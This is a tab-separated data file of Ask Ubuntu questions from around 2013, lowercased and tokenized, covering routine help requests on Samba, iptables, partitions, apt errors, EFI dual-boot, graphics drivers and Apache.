307285	samba catia filename mapping	i 'm running ubuntu server 12.04.2 lts as an activedirectory connected mail server using dovecot and postfix . all works fine on this part . now we want to export the mail storage for backup purposes . i installed samba and joined it to the domain . this is what my samba share looks like : [ global ] mangled names = no [ mailstore ] comment = mail storage path = /srv/vmail valid users = administrator force user = vmail force group = vmail i can now access the mail storage with the administrator account ( which is the one used by the backup application ) . when browsing the mail storage i see filenames containing `` : '' which is invalid for windows . dovecot uses it for adding some sort of status info to the filenames in the maildirs . i want to leave it that way . but windows can not read those files . so after some googling i found the following solution supposed to fix it : [ mailstore ] vfs objects = catia catia : mappings = 0x22:0xa8,0x2a:0xa4,0x2f:0xf8,0x3a:0xf7,0x3c:0xab,0x3e:0xbb,0x3f:0xbf,0x5c:0xff,0x7c:0xa6,0x20:0xb1 but although the `` : '' ( 0x3a ) is mapped , it has no effect on the filenames when browsing the share with windows explorer . the filenames are not changed . i 've tried mangled names = yes but that does only clobber up the filenames till unusuability . it converts all filenames with illegal characters into 8.3 format - we can not use this for recovery . and i do n't think it would have an effect on vfs settings anyway . so why does samba not use the vfs module ? i can see no errors about it in the logs . and `` locate '' reveals the respective library vfs_catia.so installed . the samba version is supposed to support this configuration according to docs : # smbd -v version 3.6.3
307287	simple shell script	i am quite inexperienced when it comes to linux and now i am setting up the system . what i want to do is to write a shell script , that will do two things : start i2prouter - as i do not want it to run all the time as a daemon as it takes lots of traffic . will run new iptables procedures that will set new rules for the internet . i made a new iptables rules file ( called iptables.up.rules ) when i do it from terminal i write the following i2prouter start sudo iptables-restore < /etc/iptables.up.rules but if i just put it in the .sh file and make it executable , it does not seem to work .
307290	can i run command-line commands within a python script ?	sorry i 'm kind of a noob at this : basically i 've downloaded this package that deals with text files that is run from the terminal , but the command i need takes in two arguments . i also need to do this many times ( 5000+ ) . i need to get these arguments with a python script , and can loop it many times using python . so could i get the arguments within the python script , run the command-line line , and loop it ? how ? thanks !
307294	ubuntu touch running on fairphone - are there agreements ?	i bought a fairphone ( http : //www.fairphone.com ) because i 've read that it should be open for different os , e.g . ubuntu touch . now i would like to know , if canonical will use that chance to provide ubuntu touch on that hardware ? people that are interested in fair hardware are normally more open for ideas like open software , so that could be a good anchor to make ubuntu touch more public .
307296	i really messed up my installation / wrong size for encrypted root partition	i have already installed ubuntu 12.04 but i made a huge mistake while installing . while installing , the setup asked me to allocate drive space . i have a ~650gb hard drive that shows up as : c and : d in windows . : c is where i had windows 7 installed + all user files . before installation of ubuntu : d was completely empty with about 400gb of drive space . ubuntu automatically chose : d to allocate space on . i decided against using the advanced settings because i did n't want to screw things up ( and look what happened ) . it asked me to use the slider to indicate how much space i want for the swap ( i think ) and just regular storage space . i hastily slid it to where i thought i was giving myself the most free space but i ended up only giving myself 23gb of disk space , and ~400 to the other option . i also selected the option to encrypt the /home directory , thinking i was making the right decision . i 've downloaded gparted but i ca n't expand the / ( ext4 ) obviously because its mounted . i also did another stupid thing and unmounted the ~400 part ( sda5 ) thinking that 's how i could add it back to ext4 . i read somewhere that you ca n't edit/change/re-size mounted partitions . ( i tried to post a picture but i do n't have enough rep ) it reads like this though : /dev/sda5 ( no key ) ntfs ( mo mountpoint/i unmounted it ) 377gib < br > /dev/sda7 ( key symbol ) ext4 ( mountpoint / ) 22gib before i messed it up , sda5 read as : /dev/sda5 ( key symbol ) ntfs ( mount point /media/blahnumbersletters/ ) 377gib i 've been searching around and many have suggested i boot the ubuntu live cd and download lvm and crypt-setup , etc to expand the encrypted partition , but i ca n't seem to boot with the live cd . i 've tried everything , pressing esc , f2 , f4 , f10 , f12 , del , most of which just take me to the grub boot-load program or they take me to the boot options but none of them give me the option to boot from the cd . i do n't know if this is necessary but my system is a samsung laptop np-qx411 . i 'm completely lost . what do i do here ? thanks in advance .
307298	where is the result of the `` apt-get update '' package list stored	i have 20 to 3o computers on my network and i have a copy of the debian packages on /var/cache/apt/archives but when i take this downloaded copy to any other machine i need to hit an `` apt-get update '' , how do i avoid this ? where is the list of packages which is updated by that command stored . i need to copy them as well , and use it on a computer which is completely offline .
307300	ubuntu broken - how to access /home/username/.profile	i made a mistake while i was changing /home/username/.profile file . now i ca n't access my user session , i can only use guest session . how can i access that file so i can fix it . i already tried using root and nano , but i got error that system is read only , although i used sudo . i tried booting from live cd but i ca n't access my home folder , i only get home folder from live session . please help .
307302	relative path to source when copying or moving	this might be trivial , but here goes . in terminal , i tend to find myself moving/renaming/copying files that are not in my current working directory instead of cd-ing to the directory of those files first . for example , i find myself doing : mv long/path/to/a/folder long/path/to/a/folder.old sometimes , this can be a `` long/path with spaces/to/a/folder '' . my question is : is there a way/shortcut for the < target path > to be relative to the < source path > ? for instance , does something like this exist : mv long/path/to/a/folder `` /folder.old where `` means `` the same path or the same parent path of the file/folder i 'm trying to move '' , so in my example `` would stand for long/path/to/a/ . i know i could of course cd long/path/to/a/ and then mv folder folder.old , but that involves an extra command , and i 'll end up in another working directory .
307306	dual boot ubuntu 13.04 with windows 8	i need help with booting ubuntu on my windows 8 laptop . i got the iso image extracted onto a dvd . what next ? i already tried easy bcd 2.2 and it did not help ! i also tried a you tube video , and that did not help either .
307310	updating ubuntu fail	i am trying to update ubuntu 12.04 using the update manager , but when i click the check button in the update manager window i get an error saying : failed to download repository information in the details it shows : w : failed to fetch http : //ppa.launchpad.net/ronmi/wallbox/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ronmi/wallbox/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . normal updates that show up automatically work just fine , but i want to upgrade my ubuntu to the newer version without removing it and installing the new one . what do i have to do to get this update to download and install ?
307316	how to disable disk lock ?	i am a new ubuntu user and have recently installed ubuntu 12.04 to my computer . now every time i turn on the computer it keeps asking me to introduce a password for the disk lock or something before i can put the password for the user . i know the password no problem , the issue is that it 's annoying to introduce two passwords and i need to format and reinstall ubuntu to the same machine again . any ideas how to disable that lock ? again , i know the password but i want to disable it and be able to format the whole disk again . would , really appreciate it a lot !
307317	cd to target folder after copying ?	this could be quite a simple one , but i ca n't find any answer for it . if i am in a terminal and use the cp command , is there a way of instantly cding to the target directory ? for example , is there some equivalent to cp foo/file.ext ../bar/subdir/ ; cd ../bar/subdir/ that does n't require retyping the path to the target folder ?
307318	which application can i use for a network traffic monitor	is there a way to see all the traffic ? from which process with the real name is accessing to which ip with the real name at which bitrate ? when i say real name i am referring something like this : midori @ mycomputer > > > h**p : //askubuntu.com/questions/291494/gui-tool-for-monitoring-traffic ~ 4 kbps / 2 kpbs i have a home network with two computer , one is sharing its wifi connection to a public hotspot and a i 'm becoming paranoid because i have seen some huge traffic to a lightware network website . i have tried , iftop , nethogs , jnettop and none of them have been useful or i was unable to get the information that i want .
307324	ubuntu wo n't boot due to missing bootmgr	i had windows 7 and had to recover to factory settings . i had no windows 7 disk , so i decided to switch to ubuntu . i formated my c : drive but when i go to install ubuntu , it tells me that it is missing the bootmgr . i formated my disk the installation disk to fat32 . i 'm still getting the message bootmgr missing . what can i do ?
307327	how revert to 12.10 from 13.04 ?	is there a way to revert to 12.10 from 13.04 ? since i upgraded , my laptop behaves strangely , slowed down , freezes , the ventilator doe n't work anymore and i get error messages like the following : [ 16671286 ] usb 4-1 string descriptor 0 read error -22 | < @
307331	screen freeze on 13.04	i have installed 13.04 on my desktop and the screen freezes when i click a little faster . my pc is 2 years old . is this a common problem ? only way out is to do a hard reset . any help is much appreciated .
307334	how do you convert a customized ubuntu installation into a distro ?	i 've been thinking of making a linux distro ( just a hobby , wo n't be big and professional like ubuntu ) for some fun and gaining knowledge . i 'm thinking of starting small and basing it off ubuntu with the mate desktop environment ( which i will highly customize ) . i will also make my own theme which i will draw from scratch ( windows borders , background set , icons , mouse , menu bars , buttons etc ... it will only include programs in the `` program launcher/start menu '' that i have made myself with the mono framework except for maybe the ubuntu software centre . i 've heard linux mint or ubuntu comes with a live usb maker that converts your customized ubuntu/linux mint into a distro or something but i do n't know if that 's the proper way to make a distro or if it exists/is what i think it is . anyway any help on how to convert a modified version of ubuntu on my computer into an actual distro that i can upload online for people to download and install onto their computer would be very useful . does a program that does this automatically for you exist ? does it simply make an iso image or is the process more complicated ?
307338	any way to `` play to '' tv from ubuntu ( not a media server )	like the title says ... i 'm looking for a way to play music/videos from my media player to a tv on the same network . basically like you can do with windoze media player and have been able to do for a while ... surely linux can do something the same or better ? i 'm not looking to install a media server then use the tv to browse the media server and find files , which i have done already and the media browser on the tv is a bit frustrating when you have many files .
307350	could not find settings panel `` unity-appearance ''	i just updated/upgraded ( technically dist-upgrade but it was already 13.04 ) this morning and now my appearance setting is missing . i can select it from the unity menu but nothing happens and it 's missing from the settings options . any ideas how to get it back ? i have gnome-control-center-unity installed and the other thing that has happened is that the background for the other settings has turned black . here are the relevant entries in /var/log/dist-upgrade/ apt.log , apt-term.log and i 'm actually not seeing anything in main.log relevant to this - it 's all from 5/3/13 instead of today . i 'm not entirely sure what other logs could/would be helpful and i 'm not sure if this is in fact a bug or if i just screwed something up . some other things i 've tried : purge and re-install gnome-control-center-unity rm -rf ~/.config/* ( a little overkill but i was getting frustrated ) purging/removing gnome-shell admittedly it 's not a requirement to have the appearance settings back but it would make my life a bit more pleasant -i could just install nitrogen or something for wallpaper management but i do enjoy the auto-hide of my old unity set-up for my dual monitors .
307352	can i transfer files alo copy paste in remmina ( or another rdp client ) on 13.04 while connected to a windows 7 ?	when i connect to a remote windows 7 using as from a windows 7 machine , i can copy paste files between machines . how can i enable that feature while using as from ubuntu ?
307354	how worried should i be about port 22 ?	i am learning hadoop and i need to ssh onto localhost in order to set up a pseudo distributed system . i read on another forum : http : //www.linuxquestions.org/questions/linux-desktop-74/ssh-connect-to-host-localhost-port-22-connection-refused-935331/ ... that doing so by installing openssh-server would open up port 22 to the internet , which makes sense . my question is : is the password that i use when i execute sudo *somecommand* the one that a hacker would need to crack in order to access information on my computer ? and ( just one more ) if this is the case , how do i make a secure password that is n't a pain to type out every time i use sudo ? preferably i would like to have the sudo password be short and the `` port 22 '' password be something ridiculous and very long
307355	how to set default path variable	i broke the /home/username/.profile file so now i ca n't access ubuntu . how can i reset the .profile file back to its defaults ? when i try to write something using root , i get error message that the file is read only . i broke path variable to be more accurate . how can i fix this ?
307360	how to convert from iso to img file ?	following the instructions on the website for creating a bootable usb stick i put the following in the osx terminal : hdiutil convert -format udrw -o ~/users/steve/desktop/ubuntu32bit/ubuntu-12.04.2-desktop-i386.img ~/users/steve/downloads/ubuntu-12.04.2-desktop-i386.iso but i received the following error message : hdiutil : convert failed - no such file or directory any idea what i 'm doing wrong ?
307361	internet stops working after a few minutes ( 13.04 )	seemingly at random , my internet stops working on ubuntu 13.04 . specifically , wired and wireless show as connected , but i can not reach any page using any web browser or get a ping response . i can sometimes get a few minutes of internet access when i reboot , although whether or not this happens also appears to be at random . it always disappears , although still shows as being connected , after no more than 5 minutes though . i 've isolated the problem to ubuntu itself : no issue on windows 7 issue persists on unity , cinnamon desktop , gnome desktop issue persists with multiple networks i 've also tried sudo dhclient wlan0 as recommended in a similar thread , with no luck after rebooting . i 'm unsure of what the issue could be , because it worked previously with no issues on 12.10 and 13.04 , and i ca n't isolate any action that caused it . if anybody has any ideas , i 'd be very grateful .
307362	reinstall nokutusp in ubuntu	i 've installed the nokuntusp 6.53 and after installation i got an error message like this : the package nokuntusp needs to be reinstalled , but i ca n't find an archive for it . please help me out with this problem ?
307366	can i get the ubuntu dash in xubuntu 13.04 ?	i 'm using xubuntu on an old computer and i wonder if it would be possible to have the ubuntu 13.04 dash in it . i have tried using ubuntu but it became too laggy . i basically just want it because it 's much cooler than the default `` finder '' .
307367	top and bottom toolbars disappear after changing `` workspace switcher preferences '' following 10.04 to 12.04 upgrade	i updated from 10.04 to 12.04 yesterday . i used gnome instead of unity . i also was configured to have a single row of 6 screens/desktops in the `` workspace switcher preferences '' . after the upgrade this was reset to be two rows of two screens/desktops . when i set the preferences to again have a single row of 6 screens/desktops i initially see them show up on the bottom toolbar/panel . the problems start when i try to switch to another screen from screen 0 . all decorations , toolbars , etc. , disappear . i can not force a manual switch between screens . all i see is the background . if i do the ctrl-alt-backspace to logout then log in again i get the toolbars/panels but they have been reset to 2 high and 2 wide instead of the single row of 6 that i set in the preferences . what changed between 10.04 and 12.04 that would cause this and what do i need to do to get back the environment i wish to operate in ? ( i am accustomed to having specific apps on specific screens/desktops so changing to a 2x2 model is not desirable . ) thanks for any help you may provide on this problem .
307371	ubuntu on samsung series 5	i want to buy a samsung series 5 laptop , but i read , that an installation of ubuntu could break it ( because of uefi ) . but i also read , that ubuntu fixed the problem . is that right ? can i install ubuntu on it , without the risk to kill it ?
307373	trouble installing itunes and reading usb dvd drive on ubuntu	i am new to ubuntu and struggling with a few things : an error occurred when checking for updates whilst trying to install something to read itunes , or at least read music from iphone . i 've got this red 'no entry ' mark next to my message on tab . another problem - i tried to read usb dvd drive , but got following message : e : type ânâ is not known on line 3 in source list /etc/apt/sources.list.d/pmcenery-ppa-maverik.list
307374	want to manually configure ethernet as second ( internal ) network	running ubuntu 13.04 i am trying to configure a machine as a drbl server so i can use clonezilla to master a bunch of machines . but before we get to that point , i was just testing the networking . i have an unmanaged , 1gb switch . wlan0 is connected to the internet as 192.168.1.149 . i want to setup a second private subnet on eth0 . i tried : sudo eth0 down sudo eth0 up sudo eth0 192.169.1.1 then , on a windows machine , we manually set ip to 192.169.1.3 we can momentarily ping each other . but when i try to run putty from the pc , suddenly the network is unavailable , and ping no longer works in either direction . the problem is definitely on the linux side , ifconfig eth0 reports no ip address . either there is some automated utility changing our network settings , or it could be a firewall . i tried to run networkmanager , but get the error `` networkmanager is already running ''
307380	a strange routing problem	i built a router based on ubuntu server 13 , which connect to the internet by vpn ( yes , by pptp-linux ) . and i installed squid3 on the same server . i can visit all websites ( facebook and twitter included ) by setting up a proxy server to this router , no matter what the network gateway set to , coz the client computer is in the same subnetwork of this router . but , if i dont set the proxy , but the gateway to this router , the problem is : i can nav to most web sites except facebook and twitter . yes , within all my tests ( youtube , google , etc ) , only facebook and twitter is not available . connection timed out . i checked the result of traceroute of facebook and twitter from the router and client , they are same . the dns of the client computer is set to the same as the router , not the router itself . any idea ? thanks .
307383	can i run ubuntu on my old laptop ?	i want to install my first linux ever , and i have already given up on mint because it requires pae , which i believe my processor does n't support . it 's an old ibm thinkpad : 1gb of ram pentium m 1.7ghz graphics card : ati mobility radeon 9600 series so , can i run ubuntu normally ? or kubuntu , or even xubuntu ? if i chose one of these two , would there be some downsides in comparison to ubuntu ? i 'm talking about the latest versions of these distros , 13.04 i guess .
307384	suspend fails to resume on lenovo g780 ubuntu 13.04	i installed ubuntu desktop over ubuntu server and am facing a serious problem with suspend . when i press any button to resume , the screen flashes white then turns black . pressing ctrl+alt+f1 and other combinations do nothing . my laptop is the ubuntu g780 . processor is i7-3570m , gpu is vesa intel graphics ( intel hd graphics 4000 ) . i tried to install the intel graphics drivers , which has done nothing to fix the problem . i have also used google to no avail . the backlight problem does not apply to me . tried the ubuntu page with no success .
307385	how can i get firefox that i installed manually to open external links ?	i use the ux and nightly builds of firefox from ftp as my default browsers , but they do n't open external links ( just a new blank window ) . so for example in a help file that is expected to open with whatever the `` default '' browser is instead firefox opens just a blank window instead of the actual page when i click on an external link ? how can i fix this ? i 've got a custom desktop file to launch the browser in ~/.local/share/applications , and if it makes a difference i 'll post its contents here ( let me know in the comments ) . here are the contents of the .desktop file : [ desktop entry ] type=application version=1.0 hidden=false terminal=false icon=/usr/share/icons/fs-icons/apps/scalable/firefox-original.png name=firefox nightly ftp build comment=firefox nightly ftp build exec=/home/rolandixor/bin/firefoxui/firefox path=/home/rolandixor/bin/firefox
307387	root password not recognized when attempting to install third party software on ubuntu 13.04w	why is my root password not recognized when installing third party software on ubuntu 13.04 ?
307389	coolship `` computer in a keyboard '' for ubuntu ?	i am about to receive an indiegogo crowd-source funded `` artesinal '' android 4.0 computer in-a-keyboard , called `` coolship '' . how can i run ubuntu on this new a-9 dual-core +quad-core low-cost desktop ? rom 's and firmware are removeable and replaceable with factory boards with a lifetime free replacement guarantee . http : //www.focuswill.com/html_info/coolship-6.html . looks like a good mix as a cheap ubuntu linux platform : $ 89-139 .
307392	emachines destop wo n't run 13.04 or the 3.8 kernel	i have an 'older ' triple boot ( 12.10 , 13.04 and vista i386 ) desktop running an early version of a dual core intel chip . it runs well on 12.10 and the 3.5 kernel , but when i upgraded the partition i use for testing and bug reports to 13.04 , it will only boot either in recovery mode or on the residual 3.5 kernel . i ca n't run a live dvd/usb 13.04 system or a full installation of 13.04 on an external drive without the system rebooting before anything happens . my newish laptop runs everything well as does my old one , which has been using ubuntu since hardy . any suggestions , both sane and wacky are requested .
307398	installing from zipped files	i just downloaded ubuntu ( complete beginner ) and have a huge pack of zipped files . what should i do to actually install ? if someone could point me to the right answre i 'd appreciate as i have spent a bit of time searching and am still unsure
307399	why is guake no longer displaying command prompt before $	guake is no longer displaying the user and directory in the command prompt like : < name > @ < name > - < computername > : ~ $ instead it only displays the $ symbol which only separates the prompt from the command : $ also pressing 'tab ' actually inserts a tab space instead of completing a command or displaying possibilities . it was like that when i logged in this morning and i can not think of anything i could have done to change how guake is working . so far i 've tried logging in again , restarting my computer , and uninstalling , then installing guake again . no results .
307403	twitter `` authentication error '' turpial & choqok ( latest versions )	i use turpial a lot , but turpial is n't connecting at all . i can still connect to twitter thru the os app ( no issues signing in through online accounts ) and of course i can still sign in using the browser , but turpial gives me an `` authentication error '' and choqok fails to do anything . i 've tried changing my password , revoking the turpial and ubuntu apps in twitter and re-enabling them , but then it gives me an `` invalid credentials '' message . i 've even removed and installed turpial multiple times , still nothing . i ca n't find any information or resources for this type of error from turpial online . i think it may be something recent after finding this message elsewhere : ( article related to `` birdie '' ) it looks promising i 'm currently using it atm , since all the other twitter clients no longer work due to the api 1.0 shutdown ( posted today ) i 've never used choqok before today , so i do n't even know if i 've set it up properly . it 's failing to retrieve or send tweets it just blank screens , but at least it signs in . i 've figured that this is n't an issue with ubuntu , or turpial or choqok , or the router ( already replaced it today ) , so i do n't really know what i 'm dealing with here . i hope it 's not another api issue , facebook did something similar just a few weeks ago
307405	can i run these games on my system ?	i have an ubuntu pc with these specs : hp g62-378ca . i would like to know if i would be able to run team fortress 2 and/or counter strike source . thanks .
307406	application running in foreground ?	gvim has the -f option . its man page says , -f foreground . for the gui version , vim will not fork and detach from the shell it was started in . what does this mean ? i encountered this option when trying to make the global menu work for gvim from how to get global application menu for gvim ? . i thought it would be that gvim -f file & would show gvim and gvim file & would n't . but they both seem to have same behavior .
307407	external webcam for	i have a toshiba laptop with built in web cam and a logitech web cam for my big screen tv . on video calls the built in cam works . can i switch this feature to the external web cam . how can i get my logitech c110 webcam to work on my toshiba satellite laptop on 13.04 ? thanks
307408	need a way to start web cam recording at specific time	i have a laptop with an integrated camera and i want to write a script that will record a 10 minute video when the clock reaches a certain time . what apps/commands can i use to achieve this ?
307413	how to change right-click menu style in ubuntu	i hate one thing about ubuntu : the ugly menus , which are very basic . it seems to me very ancient . i want to change the desktop right-click menu and the same for the top panel . i wish i could make them round . it 's not about the colour , but the style . i used kde environment and it 's menus were much , much better than gnome , but i do n't want to use kde . is there anyway to change these styles ? i have seen so many questions like mine but without answers . i think ubuntu is a great operating system but the menus make it almost ugly for some people .
307417	webcam not detected in google hangots	how can i get my logitech c110 to work with google hangouts in 13.04 on my toshiba laptop ? integrated webcam works . logitech c110 does not turn on . have cheese installed logitech c110 tests fine , but will not turn on for hangouts .
307420	unable to install python module in ubuntu	i tried to install some library using below command sudo apt-get install libmysqlclient-dev and getting below error.. err http : //archive.ubuntu.com/ubuntu/ maverick/main zlib1g-dev i386 1:1.2.3.4.dfsg-3ubuntu1 404 not found [ ip : 91.189.91.14 80 ] err http : //archive.ubuntu.com/ubuntu/ maverick-updates/main libmysqlclient-dev i386 5.1.61-0ubuntu0.10.10.1 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/z/zlib/zlib1g-dev_1.2.3.4.dfsg-3ubuntu1_i386.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient-dev_5.1.61-0ubuntu0.10.10.1_i386.deb 404 not found [ ip : 91.189.91.14 80 ] w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ maverick/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_maverick_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? tried for sudo apt-get update it is also giving similar error . please help , thanks in advance .
307424	as a consumer can i buy ubuntu for my android phone somewhere ?	can ubuntu for android plug into the monitor of a tablet as it 's visual monitor so that the phone runs a computer on a tablet ? thanks
307429	when ubuntu is used on a tablet will it function like a computer ?	is it possible to load ubuntu for a full computer onto a tablet ( not a tablet pc ) so that i could use open office or other software that i could use in ubuntu on a full computer on a tablet ? thanks !
307433	how do i drag-and-drop a file into a window that 's not in the foreground ?	in windows , if i 'm dragging a file or a piece of text and i want to want to drop it into a window that 's currently not in the foreground i can simply hover over that window on the task bar and the appropriate window will come to the foreground . i just tried doing this on ubuntu and it did n't work . is there a way around this ?
307434	failed to start apache2 gracefully	here is a new installation of apache2 on a ubuntu 12.04 machine ( home user ) i am trying to start the service apache2 after creating a file in sites-available directory and enabling the website i am getting following error user @ ubuntu : /etc/apache2/sites-enabled $ service apache2 reload * reloading web server config apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) httpd not running , trying to start ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'graceful ' failed . the apache error log may have more information . [ fail ] now there i do not find any thing in apache log as such but posting here error.log [ tue jun 11 22:14:09 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) configured -- resuming normal operations [ tue jun 11 22:14:14 2013 ] [ notice ] caught sigterm , shutting down [ tue jun 11 22:14:15 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3 with suhosin-patch configured -- resuming normal operations [ tue jun 11 22:16:41 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ wed jun 12 16:02:54 2013 ] [ notice ] caught sigterm , shutting down [ wed jun 12 17:03:45 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3 with suhosin-patch configured -- resuming normal operations [ wed jun 12 23:04:19 2013 ] [ notice ] graceful restart requested , doing restart [ wed jun 12 23:04:23 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3 with suhosin-patch configured -- resuming normal operations [ thu jun 13 00:09:50 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ thu jun 13 00:43:26 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico and here is access.log 127.0.0.1 - - [ 11/jun/2013:22:16:40 +0530 ] `` get / http/1.1 '' 200 483 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 11/jun/2013:22:16:41 +0530 ] `` get /favicon.ico http/1.1 '' 404 498 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 12/jun/2013:23:04:19 +0530 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' 127.0.0.1 - - [ 12/jun/2013:23:04:19 +0530 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' 127.0.0.1 - - [ 12/jun/2013:23:04:19 +0530 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' 127.0.0.1 - - [ 12/jun/2013:23:04:19 +0530 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' 127.0.0.1 - - [ 12/jun/2013:23:04:19 +0530 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' 127.0.0.1 - - [ 13/jun/2013:00:09:49 +0530 ] `` get / http/1.1 '' 200 483 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 13/jun/2013:00:09:50 +0530 ] `` get /favicon.ico http/1.1 '' 404 498 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 13/jun/2013:00:43:25 +0530 ] `` get /tshirtshop http/1.1 '' 301 555 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 13/jun/2013:00:43:25 +0530 ] `` get /tshirtshop/ http/1.1 '' 200 646 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 13/jun/2013:00:43:26 +0530 ] `` get /icons/blank.gif http/1.1 '' 200 437 `` http : //localhost/tshirtshop/ '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 13/jun/2013:00:43:26 +0530 ] `` get /icons/back.gif http/1.1 '' 200 506 `` http : //localhost/tshirtshop/ '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' 127.0.0.1 - - [ 13/jun/2013:00:43:26 +0530 ] `` get /favicon.ico http/1.1 '' 404 498 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.52 safari/537.17 '' what is wrong with apache2 service that it is unable to start ... .
307436	can not install ubuntu onto usb from windows 8	i can download the universal installer ( 1.9.3.5 ) to my desktop and i can download the saucy-desktop-amd64.iso to my desktop but the installer set-up can not recognise the file as `` .iso '' so will proceed .
307441	how to install again update manager after uninstalling it	ok , the thing is this i tried asking many times on few ubuntu forums how to deal with my non-responsive update manager , but all i was getting was the same stuff ( run it from the terminal , run some lines , apt-get update blah blah ) . nothing was helping . eventually i went mad windows style and tried to simply uninstall it and install it again . the problem is - how to install it again ? ca n't do it through software center , ca n't really build a package ( because i 'm too stupid to do that ) . and i seriously want to avoid reinstalling the whole system . i am running a 12.04 verison ( update manager was unable to update to a newer one ) please help . i am furious with this thing .
307442	how can i install python-setuptools-git on precise ?	i see there is a package for this beginning with quantal , but where can i get it for precise ?
307452	geforce gt650m laptop driver	ubuntu was working with default mesa graphic drivers . i tried to install nvidia driver for my geforce gt650m . i installed different versions of nvidia 319 , 310 , etc . all of them installed but my entire ui system crashed . now my login screen looks so small , i do n't have desktop or unity . i am running 13.04 . my story about the nvidia drivers : at first apt-get install nvidia-current , removed it later . then i just downloaded nvidia 319 310 313 different versions with wget stopped gdm and just run ./nvidia
307459	windows 7/ubuntu installed on seperate drives , get invalid efi message when selecting windows at boot	i recently decided to take the plunge with linux , by installing what i understand is the most user friendly of the distributions , ubuntu . i had a spare hdd going , after switching to an ssd for my win 7 installation . so , i felt it would be relatively safe to experiment with linux on the empty drive . i installed ubuntu using the recommended settings ( after fumbling about with partitions and swap space and , i think , managing to install ubuntu without a boot loader -_- ) , and everything seemed to be fine , and i was pleased to discover a menu that offered multiple boot options , including the newly installed ubuntu and win 7 on the other disk . when i select ubuntu , it loads and operates perfectly . when i select win 7 , it gives me the invalid efi error . when i change the boot order to use the ssd first , win 7 loads as it had always done . no problem with my installs , i 'm guessing the problem is with the boot manager . after looking at similar questions and threads about the efi issue , i install and run boot-repair , choosing the recommended/default option . it mentioned an issue to do with gpt ( which i ca n't quite remember at the minute ) and suggested enabling the seperate efi partition option , which i did and re-ran it to no avail . i have not yet tried the other advice in the error message , which was to create the partition with something like gparted . i tried to install refind from the debian package , but it error 'd and did not complete . any advice on how to either fix my issue , or correctly install refind ( if that would help ) would be appreciated . i 'd prefer not to have to change the boot order every time i want to change os , especially since i 'm using a wireless keyboard that is n't detected during start-up . : ) it 's a 64-bit machine . http : //paste.ubuntu.com/5758960/ - my boot-repair output . edit : tried reinstalling refind , apparently it worked this time , though the win 7 option only sent me into what i think is grub , where it 's win 7 option still gave the invalid efi error . i read in this thread , invalid efi file path , how the windows loader may have been renamed . renaming the file as per the instructions only yielded an error when launched from refind . is the grubx64.efi file relevant ? edit 2 : there is a bootmgfw.efi in the windows folder on the ssd , is it worth trying to point the grub.cfg chainloader parameter at that ?
307462	trying to change kde setting something changed the font/font rendering and i ca n't go back	i was going through list ( the first post ) ... i changed some of the settings and some other things in the system menu , but somewhere for some reason , the font of most applications changed , and now they seem thinner and do n't seem to render correctly : i went through what i think was all the options i changed and ca n't seem to bring back the correct/better rendering . i did n't change anything in the font management . in the application appearance > style > fine tuning i now have it set to high resolution high cpu , but it does n't help . in the dektop effects > all effects menu , there does n't seem to be anything related . workspace appearance is untouched . i 'm not sure what could it be .
